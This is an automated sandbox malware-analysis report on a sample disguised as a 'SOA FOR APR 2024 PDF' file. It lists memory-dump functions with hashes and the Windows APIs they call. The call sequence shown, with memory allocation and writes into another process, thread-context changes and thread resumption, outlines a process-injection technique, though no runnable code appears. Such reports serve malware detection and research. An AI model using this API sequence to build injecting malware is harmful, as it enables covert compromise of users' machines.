                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c5b5d2d49414f91611dde4649f2e324c247a053220658c87308e8363bc8c26df
                                  • Instruction ID: fc468929be06e10de68ad40ff2a0a23e3796558042d5ca3027e865fc38240370
                                  • Opcode Fuzzy Hash: c5b5d2d49414f91611dde4649f2e324c247a053220658c87308e8363bc8c26df
                                  • Instruction Fuzzy Hash: 47914EB1E0021ADFDB14DF68C9417EDBBF2BF48314F1482A9E819A7290DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1B55F Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 e1b55f-e1b57f 1452 e1b581-e1b58e call e18ac0 1450->1452 1453 e1b5ab-e1b5af 1450->1453 1458 e1b590 1452->1458 1459 e1b5a4 1452->1459 1455 e1b5b1-e1b5bb 1453->1455 1456 e1b5c3-e1b604 1453->1456 1455->1456 1462 e1b611-e1b61f 1456->1462 1463 e1b606-e1b60e 1456->1463 1506 e1b596 call e1b7f8 1458->1506 1507 e1b596 call e1b808 1458->1507 1459->1453 1464 e1b621-e1b626 1462->1464 1465 e1b643-e1b645 1462->1465 1463->1462 1467 e1b631 1464->1467 1468 e1b628-e1b62f call e1af54 1464->1468 1470 e1b648-e1b64f 1465->1470 1466 e1b59c-e1b59e 1466->1459 1469 e1b6e0-e1b7a0 1466->1469 1472 e1b633-e1b641 1467->1472 1468->1472 1501 e1b7a2-e1b7a5 1469->1501 1502 e1b7a8-e1b7d3 GetModuleHandleW 1469->1502 1473 e1b651-e1b659 1470->1473 1474 e1b65c-e1b663 1470->1474 1472->1470 1473->1474 1476 e1b670-e1b679 call e1af64 1474->1476 1477 e1b665-e1b66d 1474->1477 1482 e1b686-e1b68b 1476->1482 1483 e1b67b-e1b683 1476->1483 1477->1476 1484 e1b6a9-e1b6b6 1482->1484 1485 e1b68d-e1b694 1482->1485 1483->1482 1492 e1b6d9-e1b6df 1484->1492 1493 e1b6b8-e1b6d6 1484->1493 1485->1484 1487 e1b696-e1b6a6 call e1af74 call e1af84 1485->1487 1487->1484 1493->1492 1501->1502 1503 e1b7d5-e1b7db 1502->1503 1504 e1b7dc-e1b7f0 1502->1504 1503->1504 1506->1466 1507->1466
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0bfc29520e48843e25ce26fc9ee30250f858dfb20ecaea48aa3de96c17e52ebb
                                  • Instruction ID: 9a05c3ede9ea2e94380edaca78f5de5f98854e9053a670bd7bca3db6202def6e
                                  • Opcode Fuzzy Hash: 0bfc29520e48843e25ce26fc9ee30250f858dfb20ecaea48aa3de96c17e52ebb
                                  • Instruction Fuzzy Hash: F2816970A00B058FD724DF29D54479ABBF6FF88304F10892ED08AEBA51D734E985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F421C4 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F422E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 63fb25b6224d0207f4457745ae1bf345a21b7ac5db3c871e6db5ffbd053fa0a5
                                  • Instruction ID: ba908b4ac00b89f11a264f6fa43d9c7223e728ba5c369a39d59d61e791055edb
                                  • Opcode Fuzzy Hash: 63fb25b6224d0207f4457745ae1bf345a21b7ac5db3c871e6db5ffbd053fa0a5
                                  • Instruction Fuzzy Hash: FE51E2B0D003099FDB14CF99C984ADEBFB5FF88340F24816AE818AB250D774A946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F421D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F422E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 8a81266774ffd1e7bcf926dc30f7cb91c51b774739d55440c88ad42831643151
                                  • Instruction ID: eeaf909fb9573524c296ec4c1d619dcc2300fd14aa76c0730bd9b54f153e73c5
                                  • Opcode Fuzzy Hash: 8a81266774ffd1e7bcf926dc30f7cb91c51b774739d55440c88ad42831643151
                                  • Instruction Fuzzy Hash: A041B0B1D003499FDB14CF99C984ADEBFB5FF88310F25856AE818AB210D774A985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 776ea552b5e15fa04ff2851495007cc781763a503968a6fc6848845267aed71f
                                  • Instruction ID: e2c4d616e32108a83fac57546b859d1ef01c3af485988d49e84500034f2e70af
                                  • Opcode Fuzzy Hash: 776ea552b5e15fa04ff2851495007cc781763a503968a6fc6848845267aed71f
                                  • Instruction Fuzzy Hash: 5F4101B1D00619CEDB25CFA9C884BDDBBB5BF89304F2481AAD008AB255DB755986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F410D4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F44861
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: f59a3fe780a89439daf0b1a24a389f19425751d8b4716ac9242e3ab9f13c593a
                                  • Instruction ID: 9f535396e75edbd0361417f859ce80b3926e05f8672a8fb74f2c0678d38e9a28
                                  • Opcode Fuzzy Hash: f59a3fe780a89439daf0b1a24a389f19425751d8b4716ac9242e3ab9f13c593a
                                  • Instruction Fuzzy Hash: 0641F9B5A00249DFDB14CF99C488BAABBF5FF88314F24C499D519AB321D774A841CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E144E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 57e6c7fe2631781da494308d79fa12d1a6daac98abf27da1e67f743847cd00be
                                  • Instruction ID: a1435d98649a6bbbd812e3b305b9cdca0d65cdb075593d7a55e8797bc886428b
                                  • Opcode Fuzzy Hash: 57e6c7fe2631781da494308d79fa12d1a6daac98abf27da1e67f743847cd00be
                                  • Instruction Fuzzy Hash: 1A41F2B1C00719CBDB24CFA9C884BDDBBB5BF89304F20806AD418AB255DB755985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD020 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070CD0B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 85cc01d42675e012241b62ead04c75ef108d261226789f8200e8754d75a914d0
                                  • Instruction ID: 7b14f3c8610de34a29b1c84442bfcd22d4d6f9ba8f0baef3de709c751d34962d
                                  • Opcode Fuzzy Hash: 85cc01d42675e012241b62ead04c75ef108d261226789f8200e8754d75a914d0
                                  • Instruction Fuzzy Hash: 3A2148B19003099FDB10DFAAC9857DEBBF1FF48310F10842AE558A7240D7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD028 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070CD0B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 69e3f70270a2069b1572367fe017740eec20a360134438bb7626480ab8302494
                                  • Instruction ID: 928aaa8941e424024f9620cd4324aadffabb2172923cd7161d70b2883426e7c8
                                  • Opcode Fuzzy Hash: 69e3f70270a2069b1572367fe017740eec20a360134438bb7626480ab8302494
                                  • Instruction Fuzzy Hash: 022136B19003099FDB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCE88 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070CCF0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1df0da898ece7ca238e0bd2465b46a7926504c8025d5552147341fd411b9d456
                                  • Instruction ID: 3ec444656841e4604a00d58fa3aaf2cc678984f18d145a6f3302f8e967eb56e7
                                  • Opcode Fuzzy Hash: 1df0da898ece7ca238e0bd2465b46a7926504c8025d5552147341fd411b9d456
                                  • Instruction Fuzzy Hash: A02137B19002098FDB20DFAAC5857AEBBF5EF88314F14842ED459A7240DB789945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD118 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070CD198
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: c66ea88bce5051f0573ca6662b1bdf741ef616e29ff91e3075e3d87782cac0ae
                                  • Instruction ID: 7e9a9eddddc4f4bcef5dc6c89783ee7002cb4c360dc1e07e91a3666bb0735909
                                  • Opcode Fuzzy Hash: c66ea88bce5051f0573ca6662b1bdf741ef616e29ff91e3075e3d87782cac0ae
                                  • Instruction Fuzzy Hash: D92125B19003499FCB10DFAAC984AEEBBF5FF48310F10842AE919A7250C7389944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CD112 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070CD198
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 794ad9cfcec1fa020a5b9eea5c7af2443de0c3c721ecfef10ab04aa498cb3a7a
                                  • Instruction ID: 44584d03c41fc97b3cbceae70401c047ed374c2f8efb753d5dd081fd05b84c33
                                  • Opcode Fuzzy Hash: 794ad9cfcec1fa020a5b9eea5c7af2443de0c3c721ecfef10ab04aa498cb3a7a
                                  • Instruction Fuzzy Hash: 362114B19002499FCB10DFAAC984AEEBBF5FF48310F10842AE919A7250D7389944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCE90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070CCF0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 5e27f67b76bc20ae18d9306f69ab45db7f5d47011e2de934db04b452ff847bba
                                  • Instruction ID: 9ffd3adeb6cc5ad54d655402dc5f31a26a0185de83fa25af1aaeade1ae8f9370
                                  • Opcode Fuzzy Hash: 5e27f67b76bc20ae18d9306f69ab45db7f5d47011e2de934db04b452ff847bba
                                  • Instruction Fuzzy Hash: B82115B19003098FDB10DFAAC5857AEBBF4EF48324F14842ED559A7240DB78A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1DA40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1DAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a0d1c07def5f30ee716532e34c819cfb53cc608a1170a10e0cd4e559693f3a62
                                  • Instruction ID: 80114ef202e844c266147a47a07ec20d50f7a68e6d77e48618eb7fb8de938f97
                                  • Opcode Fuzzy Hash: a0d1c07def5f30ee716532e34c819cfb53cc608a1170a10e0cd4e559693f3a62
                                  • Instruction Fuzzy Hash: B321C4B59002489FDB10CF9AD984ADEBBF9FF48310F14841AE918A3350D378A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1AFB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B841,00000800,00000000,00000000), ref: 00E1BA52
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 07b3c15a15f399e7dcc7acc4c00a56aefa16940fbc4482716eff641f8648c300
                                  • Instruction ID: 33ff6232f5f7c53fd082e1ed800aaed1bf123d1f94b3c644ed665d499519a5bc
                                  • Opcode Fuzzy Hash: 07b3c15a15f399e7dcc7acc4c00a56aefa16940fbc4482716eff641f8648c300
                                  • Instruction Fuzzy Hash: BA1114B69003088FCB20CF9AC444ADEFBF8EF88310F10842AE519B7210C379A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCF60 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070CCFD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 7322388863c592f04ad8a535bf9e98a807bed3498e899553d16e3d8d6823c97c
                                  • Instruction ID: 1ffd317f13f067d7f5128d907668512e31e7b03797e00a72039f08982b9205c3
                                  • Opcode Fuzzy Hash: 7322388863c592f04ad8a535bf9e98a807bed3498e899553d16e3d8d6823c97c
                                  • Instruction Fuzzy Hash: 331117B19002499BDB20DFAAC944AEEBBF5EF88310F14881AE519A7250CB759545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1B9E1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B841,00000800,00000000,00000000), ref: 00E1BA52
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: daa1e1f8b48b403ed3b02f798778c694d7bcf757c4bc3a8f7f63c8bec24b1e2a
                                  • Instruction ID: ae98cbaa2582fafd302a1244e652a484e3ecd0d79ecf82da0f7b7aa7d222de75
                                  • Opcode Fuzzy Hash: daa1e1f8b48b403ed3b02f798778c694d7bcf757c4bc3a8f7f63c8bec24b1e2a
                                  • Instruction Fuzzy Hash: FA1112B69003498FDB20CF9AC448ADEFBF4EF88310F10842AD429A7210C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCF68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070CCFD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: ec3fc9f0400f74a6c9d0360b441106fe8602045863ec9ddd0f86816e3e4a0606
                                  • Instruction ID: 2dcf1378f24bea6a9c6435b26b3652659f253e3b7c4a0892f6b3bdeff6482e9d
                                  • Opcode Fuzzy Hash: ec3fc9f0400f74a6c9d0360b441106fe8602045863ec9ddd0f86816e3e4a0606
                                  • Instruction Fuzzy Hash: F91149B19002499FDB20DFAAC944AEFBFF9EF48320F108419E519A7250C779A540CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCDD8 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 07ef7349d6c13ef1cb444964246ad90a0d5a3b199298d1afbd7c2b6ed7c44282
                                  • Instruction ID: ff5bfb6eda3dd66cfbeb7a806a7f89a80dc1dd1d3027c0799a2f250de47d7658
                                  • Opcode Fuzzy Hash: 07ef7349d6c13ef1cb444964246ad90a0d5a3b199298d1afbd7c2b6ed7c44282
                                  • Instruction Fuzzy Hash: CE1158B19003488BDB20DFAAC8447AFBBF5EF88324F20841AC519A7240CB789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CCDE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 6016cc922571850e814e82eb5ad414ab978cb85df4f9430414e59a9400645936
                                  • Instruction ID: 44f507a013107777a4c971b08f82765a902904222b29509f22afc5184dc17102
                                  • Opcode Fuzzy Hash: 6016cc922571850e814e82eb5ad414ab978cb85df4f9430414e59a9400645936
                                  • Instruction Fuzzy Hash: C51128B19003498BDB24DFAAC5457AFFBF5EF88324F108419D519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1B760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B7C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 58923a3e0f98c1203b4003d53d1cd8c12c50c78b64861ba4e0e9268e79534d32
                                  • Instruction ID: 806d5605d3ccc7acf9fdaed9c26bcfd06ac5acd93214e3874d17aca6c9d97576
                                  • Opcode Fuzzy Hash: 58923a3e0f98c1203b4003d53d1cd8c12c50c78b64861ba4e0e9268e79534d32
                                  • Instruction Fuzzy Hash: 29110FB5C002498FCB20DF9AC444ADEFBF8EF88324F10851AD418B7640C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D3B1800 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D3B1865
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 853fd2d083e81040fab2c7fe808eb6e1cbe0e44ae92b7767837d33ce443aa0a2
                                  • Instruction ID: fe0e70532f1e17878a32d861e657d9a7b57ed7ed218ec1e675a9578d1a91f0f3
                                  • Opcode Fuzzy Hash: 853fd2d083e81040fab2c7fe808eb6e1cbe0e44ae92b7767837d33ce443aa0a2
                                  • Instruction Fuzzy Hash: BC1122B5800348CFCB20DF9AC888BDEBBF8FB48324F10841AD558A3610C378A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D3B1808 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D3B1865
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 78e4f8946354bfcf9d329dabe9f17fb761683f6deb36ebd2a7a5e5fb3fd12e96
                                  • Instruction ID: 620526238fcbc6f877912208f63796052a9180ae40ca99579f480dd5540e24da
                                  • Opcode Fuzzy Hash: 78e4f8946354bfcf9d329dabe9f17fb761683f6deb36ebd2a7a5e5fb3fd12e96
                                  • Instruction Fuzzy Hash: C711D3B58003499FDB10DF9AC985BDEBBF8FB48324F10845AD558A7650C379A544CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DAD4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
                                  • Instruction ID: dcc433e492858bffb182ff42580dfa13c1f4964c9781a06b7247720fd7e555fa
                                  • Opcode Fuzzy Hash: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
                                  • Instruction Fuzzy Hash: 12213771904240DFCB05DF14D9C0F26BF66FB9A318F24C569E94A0B656C33AD816DBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DBD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
                                  • Instruction ID: fa68b228c95e00855ce608326d25d134f623c7b2c1e725640bc2ed2d8e32887f
                                  • Opcode Fuzzy Hash: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
                                  • Instruction Fuzzy Hash: 3021F275604204DFCB14EF24D984B66BF66FB88314F24C569E94A4B296D33AD807CA71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DBD1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
                                  • Instruction ID: 3bc465490eca4cc7062681e744b6b4cff0fd8130cdabfd1cb3b84ca1a53b21e8
                                  • Opcode Fuzzy Hash: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
                                  • Instruction Fuzzy Hash: 18210471504284EFDB05DF24D9C0F66BBA6FB88314F24C56DE94A4B296D33AD806CB71
